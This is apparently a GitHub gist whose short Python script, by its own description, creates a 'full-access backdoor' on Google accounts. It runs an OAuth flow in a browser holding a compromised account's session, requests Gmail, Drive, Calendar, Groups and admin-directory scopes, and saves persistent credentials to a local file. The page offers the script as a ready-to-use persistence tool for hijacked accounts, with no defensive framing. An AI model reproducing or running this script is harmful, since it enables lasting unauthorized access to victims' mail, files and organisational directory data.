Last active
October 12, 2022 06:21
-
-
Save ustayready/e7e6011673b21471e359b0163a9321aa to your computer and use it in GitHub Desktop.
Quickly create a full-access backdoor on Google accounts by creating a Google API project at https://cloud.google.com/console, save the client_secrets.json into the same folder and then run the script below. It will print a URL for you to access with a browser that has the compromised Google account session active so you can authorize the applic…
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
import os | |
from oauth2client import client, tools | |
from oauth2client.file import Storage | |
SCOPES = 'https://www.googleapis.com/auth/calendar https://mail.google.com/ https://www.googleapis.com/auth/drive https://www.googleapis.com/auth/groups https://www.googleapis.com/auth/admin.directory.user' | |
def get_credentials(): | |
credential_dir =os.getcwd() | |
client_secret_path = os.path.join(credential_dir, 'client_secrets.json') | |
saved_secret_path = os.path.join(credential_dir, 'saved_creds.json') | |
store = Storage(saved_secret_path) | |
credentials = store.get() | |
if not credentials or credentials.invalid: | |
flow = client.flow_from_clientsecrets(client_secret_path, SCOPES, redirect_uri='http://localhost') | |
url = flow.step1_get_authorize_url() | |
flags = tools.argparser.parse_args(args=[]) | |
flags.noauth_local_webserver = True | |
credentials = tools.run_flow(flow, store, flags=flags) | |
return credentials | |
if __name__ == "__main__": | |
get_credentials() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment